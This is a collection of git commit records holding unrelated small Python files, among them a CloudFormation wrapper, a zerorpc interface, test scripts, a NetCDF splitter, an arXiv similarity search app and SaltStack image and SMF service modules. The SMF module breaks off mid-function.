9dcc635d0d5239928415ecab7a5ddb5387f98dea | add mail.py | T620/globe,T620/globe,T620/globe | globe/mail.py | globe/mail.py | from flask_mail import Message
from globe import app, mail
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender[0], recipients=recipients)
msg.body = text_body
msg.html = html_body
mail.send(msg)
| mit | Python |
|
56ad587d21abe5251be5ce5fced8e42f1d89c2f4 | Create tutorial1.py | davidwilson826/empty-app | tutorial1.py | tutorial1.py | from ggame import App
myapp = App()
myapp.run()
| mit | Python |
|
ef8ad297634d2153d5a1675d7bb60b963f8c6abd | Add wrapper | ryansb/cfn-wrapper-python | cfn_wrapper.py | cfn_wrapper.py | # MIT Licensed, Copyright (c) 2015 Ryan Scott Brown <sb@ryansb.com>
import json
import logging
import urllib2
logger = logging.getLogger()
logger.setLevel(logging.INFO)
"""
Event example
{
"Status": SUCCESS | FAILED,
"Reason: mandatory on failure
"PhysicalResourceId": string,
"StackId": event["StackId"],
"RequestId": event["RequestId"],
"LogicalResourceId": event["LogicalResourceId"],
"Data": {}
}
"""
def wrap_user_handler(func, base_response=None):
def wrapper_func(event, context):
response = {
"StackId": event["StackId"],
"RequestId": event["RequestId"],
"LogicalResourceId": event["LogicalResourceId"],
"Status": "SUCCESS",
}
if base_response is not None:
response.update(base_response)
logger.debug("Received %s request with event: %s" % (event['RequestType'], json.dumps(event)))
try:
response.update(func(event, context))
except:
logger.exception("Failed to execute resource function")
response.update({
"Status": "FAILED",
"Reason": "Exception was raised while handling custom resource"
})
serialized = json.dumps(response)
logger.info("Responding to '%s' request with: %s" % (
event['RequestType'], serialized))
req = urllib2.Request(
event['ResponseURL'], data=serialized,
headers={'Content-Length': len(serialized),
'Content-Type': ''}
)
req.get_method = lambda: 'PUT'
try:
urllib2.urlopen(req)
logger.debug("Request to CFN API succeeded, nothing to do here")
except urllib2.HTTPError as e:
logger.error("Callback to CFN API failed with status %d" % e.code)
logger.error("Response: %s" % e.reason)
except urllib2.URLError as e:
logger.error("Failed to reach the server - %s" % e.reason)
return wrapper_func
class Resource(object):
_dispatch = None
def __init__(self):
self._dispatch = {}
def __call__(self, event, context):
request = event['RequestType']
logger.debug("Received {} type event. Full parameters: {}".format(request, json.dumps(event)))
return self._dispatch.get(request, self._succeed)(event, context)
def _succeed(self, event, context):
return {
'Status': 'SUCCESS',
'PhysicalResourceId': event.get('PhysicalResourceId', 'mock-resource-id'),
'Reason': 'Life is good, man',
'Data': {},
}
def create(self, wraps):
self._dispatch['Create'] = wrap_user_handler(wraps)
return wraps
def update(self, wraps):
self._dispatch['Update'] = wrap_user_handler(wraps)
return wraps
def delete(self, wraps):
self._dispatch['Delete'] = wrap_user_handler(wraps)
return wraps
| mit | Python |
|
e62a705d464df21098123ada89d38c3e3fe8ca73 | Define a channel interface | Laeeth/zerorpc-python,joequant/zerorpc-python,lucius-feng/zerorpc-python,jiajie999/zerorpc-python,tempbottle/zerorpc-python,rainslytherin/zerorpc-python,faith0811/zerorpc-python,topbrightwen/zerorpc-python,virqin/zerorpc-python,winggynOnly/zerorpc-python,gmarceau/zerorpc-python,stdrickforce/zerorpc-python,bombela/zerorpc-python,strawerry/zerorpc-python,ethifus/zerorpc-python,nkhuyu/zerorpc-python,pchomik/zerorpc-python,dotcloud/zerorpc-python | zerorpc/channel_base.py | zerorpc/channel_base.py | # -*- coding: utf-8 -*-
# Open Source Initiative OSI - The MIT License (MIT):Licensing
#
# The MIT License (MIT)
# Copyright (c) 2014 François-Xavier Bourlet (bombela@gmail.com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class ChannelBase(object):
@property
def context(self):
raise NotImplementedError()
@property
def recv_is_supported(self):
raise NotImplementedError()
@property
def emit_is_supported(self):
raise NotImplementedError()
def close(self):
raise NotImplementedError()
def new_event(self, name, args, xheader=None):
raise NotImplementedError()
def emit_event(self, event, timeout=None):
raise NotImplementedError()
def emit(self, name, args, xheader=None, timeout=None):
event = self.new_event(name, args, xheader)
return self.emit_event(event, timeout)
def recv(self, timeout=None):
raise NotImplementedError()
| mit | Python |
|
10f7e5c8c1a2cdc84f706ccad041755b83c4953b | Create htmlsearch.py | nesbit/BerryStone | htmlsearch.py | htmlsearch.py | import glob
print glob.glob("*.html")
arr = glob.glob("*.html")
i=0
k=[]
ray =[]
while i < len(arr):
file = open(arr[i], "r")
#print file.read()
k.append(file.read())
i = i+1
print k
'''
Outputs:
print print glob.glob("*.html")
['source.html', 'so.html']
print k
['google.com', 'socorop.com']
'''
| mit | Python |
|
46eb1c2d10316eae4d85b3d689307e32ed763d07 | add 6-17.py | gbjuno/coreprogramming | chapter6/6-17.py | chapter6/6-17.py | #!/usr/bin/env python
def myPop(myList):
if len(myList) == 0:
print "no more element to pop"
exit(1)
else:
result = myList[len(myList)-1]
myList.remove(result)
return result
def myPush(myList,element):
myList.append(element)
def main():
myList = []
for i in range(800,810,3):
myPush(myList,i)
print "myList push %s" % i
print "myList = %s" % myList
print "myList = %s" % myList
for i in range(4):
print "myList pop %s " % myPop(myList)
print "myList = %s" % myList
if __name__ == '__main__':
main()
| mit | Python |
|
7faff0ae9ea4b8d72b42d1af992bb4c72cc745ff | test program to immediately connect and disconnect | darrenjs/wampcc,darrenjs/wampcc,darrenjs/wampcc,darrenjs/wampcc,darrenjs/wampcc | test/client_immediate_disconnect.py | test/client_immediate_disconnect.py | #!/usr/bin/env python
import socket
host = socket.gethostname() # Get local machine name
port = 55555 # Reserve a port for your service.
s = socket.socket()
s.connect((host, port))
s.send("x")
s.close
| mit | Python |
|
5b6667de8b91232facec27bc11305513bb2ec3b3 | add demo tests for parameterization | bnx05/pytest-selenium | test_parameters.py | test_parameters.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import time
from selenium import webdriver
browser = webdriver.Firefox()
email_addresses = ["invalid_email", "another_invalid_email@", "not_another_invalid_email@blah"]
passwords = ["weak_password", "generic_password", "shitty_password"]
@pytest.mark.parametrize("email", email_addresses)
@pytest.mark.parametrize("password", passwords)
def test_assert_login_button_enabled(email, password):
browser.get("https://start.engagespark.com/sign-in/")
time.sleep(3)
browser.find_element_by_name("login").click()
browser.find_element_by_name("login").send_keys(email)
browser.find_element_by_name("password").click()
browser.find_element_by_name("password").send_keys(password)
@pytest.mark.parametrize("field_name, maxlength", [
("login", "75"),
("password", "128"),
])
def test_assert_field_maxlength(field_name, maxlength):
browser.get("https://start.engagespark.com/sign-in/")
time.sleep(3)
browser.find_element_by_name(field_name).get_attribute("maxlength") == maxlength
@pytest.mark.parametrize("email", [
"123@abc.org",
pytest.mark.xfail("blah"),
])
def test_assert_valid_email_entry(email):
browser.get("https://start.engagespark.com/sign-in/")
time.sleep(3)
browser.find_element_by_name("login").click()
browser.find_element_by_name("login").send_keys(email)
assert "@" in browser.find_element_by_name("login").get_attribute("value")
| mit | Python |
|
fe0acf649a8db08c0bafd00e76557e9b6020bc5a | Add example for spliting 2D variable from NetCDF | tsherwen/AC_tools,tsherwen/AC_tools | Scripts/netCDF_splitter2var_2D.py | Scripts/netCDF_splitter2var_2D.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from netCDF4 import Dataset
import numpy as np
import pylab as pl
import calendar
# add extra's for copied function...
import os, sys, argparse
import datetime
"""
Split off 2D variable from file with other variables
Notes
----
- based on software carpentary example.
http://damienirving.github.io/capstone-oceanography/03-data-provenance.html
"""
#
# --- verbose and debug settings for main
VERBOSE=False
DEBUG=False
def main( filename=None, VarName='OLSON', verbose=False, debug=False ):
"""Run the program"""
# Get the file name and location
wd, fn = get_file_loc_and_name()
# name output file if name not given
if isinstance( filename, type(None) ):
filename = wd.split('/')[-2]
if debug:
print wd, fn, filename
inFile = wd+'/'+fn
# Set output name
outfile_name = inFile+'.out'
# Read input data
VarData, input_DATA = read_data(inFile, VarName=VarName)
# Set values?
# print type(VarData)
# print [ (i.shape, i.mean(), i.min(), i.max()) for i in VarData]
# VarData[VarData>1] = 1
# print [ (i.shape, i.mean(), i.min(), i.max()) for i in VarData]
# --- Write the output file
outfile = Dataset(outfile_name, 'w', format='NETCDF4')
set_global_atts(input_DATA, outfile)
copy_dimensions(input_DATA, outfile)
copy_variables(input_DATA, outfile, VarName=VarName)
# overwite data
outfile[VarName][:] = VarData
# Close file
outfile.close()
def get_file_loc_and_name( ):
""" Get file location and name """
# Use command line grab function
import sys
# Get arguments from command line
wd = sys.argv[1]
fn = sys.argv[2]
return wd, fn
def copy_dimensions(infile, outfile):
"""Copy the dimensions of the infile to the outfile"""
for dimName, dimData in iter(infile.dimensions.items()):
outfile.createDimension(dimName, len(dimData))
def copy_variables(infile, outfile, VarName='OLSON'):
"""
Create variables corresponding to the file dimensions
by copying from infile
"""
# Get vars
var_list = ['lon', 'lat', 'time']
# also consider LANDMAP value
var_list+=[VarName]
# Now loop
for var_name in var_list:
varin = infile.variables[var_name]
outVar = outfile.createVariable(var_name, varin.datatype,
varin.dimensions,
)
outVar[:] = varin[:]
var_atts = {}
for att in varin.ncattrs():
if not att == '_FillValue':
var_atts[att] = eval('varin.'+att)
outVar.setncatts(var_atts)
def read_data(ifile, VarName='OLSON'):
"""
Read data from ifile corresponding to the VarName
"""
input_DATA = Dataset(ifile)
VarData = input_DATA.variables[VarName][:]
return VarData, input_DATA
def set_global_atts(infile, outfile):
"""Set the global attributes for outfile.
Note that the global attributes are simply copied from infile.
"""
global_atts = {}
for att in infile.ncattrs():
global_atts[att] = eval('infile.'+att)
# set attributes
outfile.setncatts(global_atts)
if __name__ == "__main__":
main( verbose=VERBOSE, debug=DEBUG )
| mit | Python |
|
4aecc9be1e2e8074a20606e65db3f9e6283eb8d3 | add utils | chhantyal/exchange,chhantyal/exchange,chhantyal/exchange | uhura/exchange/utils.py | uhura/exchange/utils.py | """
Utilities and helper functions
"""
def get_object_or_none(model, **kwargs):
try:
return model.objects.get(**kwargs)
except model.DoesNotExist:
return None | bsd-3-clause | Python |
|
071aa9f5465847fdda517d1a78c37f1dbfe69f9f | test mock | kaiocesar/tdd-python | tests/mock_bank.py | tests/mock_bank.py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import os.path
sys.path.append(os.path.join(os.path.dirname(__file__),'..'))
from src.bank import Bank
from mock import MagicMock
thing = Bank()
| mit | Python |
|
f3182c9651509d2e1009040601c23a78ed3e9b7c | Create laynger.py | amaslenn/Laynger | laynger.py | laynger.py | #import sublime
import sublime_plugin
class laynger(sublime_plugin.TextCommand):
def run(self, edit, opt='center'):
window = self.view.window()
layout = window.get_layout()
if len(layout['cols']) > 3:
return
if opt == u'center':
layout['cols'][1] = 0.5
elif opt == u'right':
layout['cols'][1] += 0.01
else:
layout['cols'][1] -= 0.01
window.run_command('set_layout', layout)
| mit | Python |
|
7a64fb0c3093fd23eeed84799c1590a72f59a96c | Create boafiSettings.py | fnzv/Boafi,fnzv/Boafi,fnzv/Boafi | webGUI/boafiSettings.py | webGUI/boafiSettings.py | #!/usr/bin/python
import os,time,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-intf', action='store', dest='intf',default="none",
help='Select interface')
parser.add_argument('-ip', action='store', dest='ip',default="none",
help='Use given ip address')
parser.add_argument('-reboot', action='store', dest='reboot',default=False,
help='Reboot the machine')
parser.add_argument('-down', action='store', dest='down',default="none",
help='Shut given interface')
parser.add_argument('-up', action='store', dest='up',default="none",
help='Turn on given interface')
parser.add_argument('-restart', action='store', dest='restart',default="none",
help='Restart given service')
parser.add_argument('-ifstat', action='store', dest='ifstat',default="none",
help='Return bandwith values of given seconds')
results = parser.parse_args()
ip=results.ip
intf=results.intf
reboot=results.reboot
down=results.down
up=results.up
restart=results.restart
ifstat=results.ifstat
if not(intf=="none"):
if(ip!="none"):
os.popen("sudo ifconfig "+intf+" "+ip)
else:
print "no ip!"
if(reboot):
os.popen("sudo reboot")
if not(up=="none"):
os.popen("sudo ifconfig "+up+" up")
print "Up interface"+up
if not(down=="none"):
os.popen("sudo ifconfig "+down+" down")
print "Up interface"+down
if not(restart=="none"):
os.popen("sudo service "+restart+" restart")
print "Restarted "+restart
if not(ifstat=="none"):
secs=ifstat
stats=os.popen("timeout "+secs+"s ifstat -t -q 0.5").read()
print stats
| mit | Python |
|
fdd2a50445d2f2cb92480f8f42c463b312411361 | Add a simple command to print all areas in all generations | Sinar/mapit,chris48s/mapit,chris48s/mapit,Code4SA/mapit,opencorato/mapit,New-Bamboo/mapit,Sinar/mapit,opencorato/mapit,New-Bamboo/mapit,chris48s/mapit,Code4SA/mapit,opencorato/mapit,Code4SA/mapit | mapit/management/commands/mapit_print_areas.py | mapit/management/commands/mapit_print_areas.py | # For each generation, show every area, grouped by type
from django.core.management.base import NoArgsCommand
from mapit.models import Area, Generation, Type, NameType, Country, CodeType
class Command(NoArgsCommand):
help = 'Show all areas by generation and area type'
def handle_noargs(self, **options):
for g in Generation.objects.all().order_by('id'):
print g
for t in Type.objects.all().order_by('code'):
qs = Area.objects.filter(type=t,
generation_high__gte=g,
generation_low__lte=g)
print " %s (number of areas: %d)" % (t, qs.count())
for a in qs:
print " ", a
| agpl-3.0 | Python |
|
9dee7d8d253847758d3252401c01215f972a22b1 | Add synthtool scripts (#3765) | googleapis/java-monitoring,googleapis/java-monitoring,googleapis/java-monitoring | google-cloud-monitoring/synth.py | google-cloud-monitoring/synth.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
gapic = gcp.GAPICGenerator()
common_templates = gcp.CommonTemplates()
library = gapic.java_library(
service='monitoring',
version='v3',
config_path='/google/monitoring/artman_monitoring.yaml',
artman_output_name='')
s.copy(library / 'gapic-google-cloud-monitoring-v3/src', 'src')
s.copy(library / 'grpc-google-cloud-monitoring-v3/src', '../../google-api-grpc/grpc-google-cloud-monitoring-v3/src')
s.copy(library / 'proto-google-cloud-monitoring-v3/src', '../../google-api-grpc/proto-google-cloud-monitoring-v3/src')
| apache-2.0 | Python |
|
92f799d0584b598f368df44201446531dffd7d13 | Copy paste artist from filename1 to filename2 | daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various | python/utilities/transform_mp3_filenames.py | python/utilities/transform_mp3_filenames.py | # Extract the artist name from songs with filenames in this format:
# (number) - (artist) - (title).mp3
# and add the artists name to songs with filenames in this format:
# (number)..(title).mp3
# to make filenames in this format:
# (number)..(artist)..(title).mp3
#
# eg.: 14 - 13th Floor Elevators - You're Gonna Miss Me.mp3
# + 14..You're Gonna Miss Me.mp3
# => 14..13th Floor Elevators..You're Gonna Miss Me.mp3
#
# Copyright 2017 Dave Cuthbert
# MIT License
from __future__ import print_function #Not needed with python3
import os as os
import re as re
TARGET_DIR = r"/insert/target/path"
def extract_artist(title):
artist_regex = re.compile(' - (.*?) - ')
artist = artist_regex.search(title)
return artist.group(1)
def get_song_list():
song_list = os.listdir(os.getcwd())
return song_list
def get_artists():
song_list = get_song_list()
artists = []
for song in song_list:
artists.append(extract_artist(song))
return artists
def insert_artist_name():
artist_names = get_artists()
old_filenames = os.listdir(TARGET_DIR)
new_filenames = []
for (old_filename, artist) in zip(old_filenames, artist_names):
new_filename = re.sub('\.\.', '..' + artist + '..', old_filename)
os.rename(os.path.join(TARGET_DIR, old_filename),
os.path.join(TARGET_DIR, new_filename))
if "__main__" == __name__:
#print(*get_artists(), sep='\n') #DEBUG
insert_artist_name() | mit | Python |
|
ec0ee6ffc7b72ba50846bac60ec63e1188bf0481 | test parser | DylanGreene/Froogle-Search-Engine,DylanGreene/Froogle-Search-Engine,DylanGreene/Froogle-Search-Engine,DylanGreene/Froogle-Search-Engine | parser.py | parser.py | #!/usr/bin/python3
import requests
import sys
from bs4 import BeautifulSoup
#filters through text from soup and strips text of whitespace
def filterText(text):
if text.parent.name in ['style', 'script', '[document]', 'head', 'title']:
return False
if text in ['\n', ' ', '\r', '\t']:
return False
return True
#prints out url with all text from url on one line
def textParser(url):
print (url, end='')
webPage = requests.get(url)
#format html and only print text from webpage:
soup = BeautifulSoup(webPage.content, "lxml")
allText = soup.findAll(text=True)
#print (allText[432])
for i in allText:
if filterText(i):
print (i.replace('\n',' '), end='')
def main():
defaultURLS = "http://en.wikipedia.org/wiki/Web_crawler"
textParser(defaultURLS)
if __name__ == "__main__":
main()
| mit | Python |
|
c6afa2826d6b1ad425919c0b4bc64101d2d4a2d1 | add first file | dojobo/deepthought_web,wkerzendorf/deepthought_web,wkerzendorf/deepthought_web,dojobo/deepthought_web | deepthought_web.py | deepthought_web.py | import random
import string
import pickle
import cherrypy
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
cherrypy.server.socket_host = '0.0.0.0'
cherrypy.config.update({'server.socket_port': 7071})
class DeepThought(object):
def __init__(self):
self.all_identifiers = pickle.load(open('all_identifiers.pkl'))
self.X_tfidf = load_sparse_csr('x_tfidf.csr.npz')
self.meta = pickle.load(open('meta.pkl'))
self.tfidf_vect = pickle.load(open('tfidf_vect.pkl'))
@cherrypy.expose
def index(self):
return """<html>
<head></head>
<body>
<form method="get" action="arxiv_search">
<input type="text" value="1207.4481" name="identifier" />
<button type="submit">Similar Papers</button>
</form>
<form method="get" action="text_search">
<input type="text" value="my astronomy paper" name="text" />
<button type="submit">Similar Papers</button>
</form>
</body>
</html>"""
def _generate_table(self, ranked_similarity, ranked_identifiers):
if np.sum(ranked_similarity) < 1e-10: return "No matches found"
print ranked_similarity, ranked_identifiers
j = 0
table_similarity = []
table_identifier = []
table_title = []
table_link = []
for simil, identifier in zip(ranked_similarity, ranked_identifiers):
table_similarity.append(simil)
table_identifier.append(identifier)
if identifier in self.meta:
table_title.append(self.meta[identifier]['title'])
else:
table_title.append('Title N/A')
if '.' in identifier:
table_link.append('https://arxiv.org/abs/{0}'.format(identifier))
else:
table_link.append('https://arxiv.org/abs/astro-ph/{0}'.format(identifier[8:]))
j+=1
print 'at', j
if j > 50:
break
data_table = pd.DataFrame(zip(table_identifier, table_title, table_link, table_similarity),
columns = ['identifier', 'title', 'link', 'similarity'])
return data_table.to_html()
def _get_similar_documents(self, test_document):
similarity = np.squeeze((self.X_tfidf * test_document.T).A)
similarity_argsort = np.argsort(similarity)[::-1]
ranked_similarity = similarity[similarity_argsort]
ranked_identifiers = np.array(self.all_identifiers)[similarity_argsort]
return ranked_similarity, ranked_identifiers
@cherrypy.expose
def arxiv_search(self, identifier='1207.4481'):
if identifier not in self.all_identifiers:
return "unknown identifier {0}".format(identifier)
else:
test_document_id = self.all_identifiers.index(identifier)
test_document = self.X_tfidf[test_document_id]
ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
return self._generate_table(ranked_similarity, ranked_identifiers)
#return ''.join(random.sample(string.hexdigits, int(length)))
@cherrypy.expose
def text_search(self, text='astronomy galaxy star'):
test_document = self.tfidf_vect.transform([text])
ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
return self._generate_table(ranked_similarity, ranked_identifiers)
def save_sparse_csr(filename, array):
np.savez(filename,data = array.data ,indices=array.indices,
indptr =array.indptr, shape=array.shape )
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
if __name__ == '__main__':
print 'loading...'
dt = DeepThought()
print "loading done"
cherrypy.quickstart(dt)
| bsd-3-clause | Python |
|
58e0ea4b555cf89ace4f5d97c579dbba905e7eeb | Add script to list objects | pazeshun/jsk_apc,pazeshun/jsk_apc,pazeshun/jsk_apc,pazeshun/jsk_apc,pazeshun/jsk_apc | jsk_arc2017_common/scripts/list_objects.py | jsk_arc2017_common/scripts/list_objects.py | #!/usr/bin/env python
import os.path as osp
import rospkg
PKG_PATH = rospkg.RosPack().get_path('jsk_arc2017_common')
object_names = ['__background__']
with open(osp.join(PKG_PATH, 'data/names/objects.txt')) as f:
object_names += [x.strip() for x in f]
object_names.append('__shelf__')
for obj_id, obj in enumerate(object_names):
print('%2d: %s' % (obj_id, obj))
| bsd-3-clause | Python |
|
04feafc2b3a13b394d5b510e9bc48e542d4880c5 | Create pfkill.py | vanzhiganov/pf | pfkill.py | pfkill.py | """
how to it use:
$ python pfkill <port number>
what doing:
1. read <port number>.pid file
2. send signal to running app
3. delete <port number>.rule
4. delete <port number>.pid
"""
import os
import sys
import signal
# import logging
port = sys.argv[1]
# read <port>.pid
pid = int(open("%s.pid" % port, 'r').read().split('\n')[0])
# print pid
# kill app by pid
# signal.SIGQUIT or signal.SIGKILL
try:
os.kill(pid, signal.SIGQUIT)
except OSError, e:
print e
# logging.INFO("ee")
# delete <port>.rule
os.unlink("%s.rule" % port)
# delete <port>.pid
os.unlink("%s.pid" % port)
# todo: exit
| apache-2.0 | Python |
|
e988a10ea18b644b9bc319286d75cb2a15079c59 | add case owners endpoint | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/apps/reports/v2/endpoints/case_owner.py | corehq/apps/reports/v2/endpoints/case_owner.py | from __future__ import absolute_import
from __future__ import unicode_literals
from corehq.apps.reports.filters.controllers import (
CaseListFilterOptionsController,
)
from corehq.apps.reports.v2.models import BaseOptionsEndpoint
class CaseOwnerEndpoint(BaseOptionsEndpoint):
slug = "case_owner"
@property
def search(self):
return self.data.get('search', '')
@property
def page(self):
return self.data.get('page', 1)
def get_response(self):
options_controller = CaseListFilterOptionsController(
self.request, self.domain, self.search
)
has_more, results = options_controller.get_options(show_more=True)
return {
'results': results,
'pagination': {
'more': has_more,
}
}
| bsd-3-clause | Python |
|
458091fe923038fe8537bf3b9efbff6157a7e57a | add tests for riakcached.clients.ThreadedRiakClient | brettlangdon/riakcached | riakcached/tests/test_threadedriakclient.py | riakcached/tests/test_threadedriakclient.py | import mock
import unittest2
from riakcached.clients import ThreadedRiakClient
import riakcached.pools
class TestThreadedRiakClient(unittest2.TestCase):
def test_get_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 200, "result", {"content-type": "text/plain"}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
results = client.get_many(["test1", "test2"])
self.assertEqual(results, {
"test1": "result",
"test2": "result",
})
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="GET",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
)
pool.request.assert_any_call(
method="GET",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
)
def test_set_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 200, "", {"content-type": "text/plain"}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
client.set_many({
"test1": "value1",
"test2": "value2",
})
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="POST",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
body="value1",
headers={
"Content-Type": "text/plain",
},
)
pool.request.assert_any_call(
method="POST",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
body="value2",
headers={
"Content-Type": "text/plain",
},
)
def test_delete_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 204, "", {}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
client.delete_many(["test1", "test2"])
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="DELETE",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
)
pool.request.assert_any_call(
method="DELETE",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
)
| mit | Python |
|
1d388bf1a38eaaafa4d79287ce7aabb59f84e649 | Add initial img module | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/modules/img.py | salt/modules/img.py | '''
Virtual machine image management tools
'''
def mnt_image(location):
'''
Mount the named image and return the mount point
CLI Example::
salt '*' img.mount_image /tmp/foo
'''
if 'guestfs.mount' in __salt__:
return __salt__['guestfs.mount'](location)
elif 'qemu_nbd' in __salt__:
mnt = __salt__['qemu_nbd.init'](location)
__context__['img.mnt_{0}'.location] = mnt
return mnt.keys()[0]
return ''
def umount_image(mnt):
'''
Unmount an image mountpoint
CLI Example::
salt '*' img.umount_image /mnt/foo
'''
if 'qemu_nbd.clear' in __salt__:
if 'img.mnt_{0}'.format(mnt) in __context__:
__salt__['qemu_nbd.clear'](__context__['img.mnt_{0}'.fomat(mnt)])
return
__salt__['mount.umount'](mnt)
def seed(location, id_='', config=None):
'''
Make sure that the image at the given location is mounted, salt is
installed, keys are seeded, and execute a state run
CLI Example::
salt '*' img.seed /tmp/image.qcow2
'''
if config is None:
config = {}
mpt = mnt_image(location)
mpt_tmp = os.path.join(mpt, 'tmp')
__salt__['mount.mount'](
os.path.join(mpt, 'dev'),
'udev',
fstype='devtmpfs')
# Verify that the boostrap script is downloaded
bs_ = __salt__['config.gather_bootstrap_script']()
# Apply the minion config
# Generate the minion's key
salt.crypt.gen_keys(mpt_tmp, 'minion', 2048)
# TODO Send the key to the master for approval
# Execute chroot routine
sh_ = '/bin/sh'
if os.path.isfile(os.path.join(mpt, 'bin/bash')):
sh_ = '/bin/bash'
# Copy script into tmp
shutil.copy(bs_, os.path.join(mpt, 'tmp'))
if not 'master' in config:
config['master'] = __opts__['master']
if id_:
config['id'] = id_
with open(os.path.join(mpt_tmp, 'minion'), 'w+') as fp_:
fp_.write(yaml.dump(config, default_flow_style=False))
# Generate the chroot command
c_cmd = 'sh /tmp/bootstrap.sh'
cmd = 'chroot {0} {1} -c \'{2}\''.format(
mpt,
sh_,
c_cmd)
__salt__['cmd.run'](cmd)
__salt__['mount.umount'](os.path.join(mpt, 'dev'))
umount_image(mpt)
def bootstrap(location, size, fmt):
'''
HIGHLY EXPERIMENTAL
Bootstrap a virtual machine image
location:
The location to create the image
size:
The size of the image to create in megabytes
fmt:
The image format, raw or qcow2
CLI Example::
salt '*' qemu_nbd.bootstrap /srv/salt-images/host.qcow 4096 qcow2
'''
location = __salt__['img.make_image'](location, size, fmt)
if not location:
return ''
nbd = __salt__['qemu_nbd.connect'](location)
__salt__['partition.mklabel'](nbd, 'msdos')
__salt__['partition.mkpart'](nbd, 'primary', 'ext4', 1, -1)
__salt__['partition.probe'](nbd)
__salt__['partition.mkfs']('{0}p1'.format(nbd), 'ext4')
mnt = __salt__['qemu_nbd.mount'](nbd)
#return __salt__['pkg.bootstrap'](nbd, mnt.keys()[0])
| apache-2.0 | Python |
|
ae5407acd1fb93fe04747a10b7bda2fc1ec91790 | add smf module to support virtual service module on solaris 10+ | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/modules/smf.py | salt/modules/smf.py | '''
Service support for Solaris 10 and 11, should work with other systems
that use SMF also. (e.g. SmartOS)
'''
def __virtual__():
'''
Only work on systems which default to SMF
'''
# Don't let this work on Solaris 9 since SMF doesn't exist on it.
enable = [
'Solaris',
]
if __grains__['os'] in enable:
if __grains__['os'] == 'Solaris' and __grains__['kernelrelease'] == "5.9":
return False
return 'service'
return False
def get_enabled():
'''
Return the enabled services
CLI Example::
salt '*' service.get_enabled
'''
ret = set()
cmd = 'svcs -H -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
if 'online' in line:
ret.add(comps[0])
return sorted(ret)
def get_disabled():
'''
Return the disabled services
CLI Example::
salt '*' service.get_disabled
'''
ret = set()
cmd = 'svcs -aH -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
if not 'online' in line and not 'legacy_run' in line:
ret.add(comps[0])
return sorted(ret)
def get_all():
'''
Return all installed services
CLI Example::
salt '*' service.get_all
'''
ret = set()
cmd = 'svcs -aH -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
ret.add(comps[0])
return sorted(ret)
def start(name):
'''
Start the specified service
CLI Example::
salt '*' service.start <service name>
'''
cmd = '/usr/sbin/svcadm enable -t {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def stop(name):
'''
Stop the specified service
CLI Example::
salt '*' service.stop <service name>
'''
cmd = '/usr/sbin/svcadm disable -t {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def restart(name):
'''
Restart the named service
CLI Example::
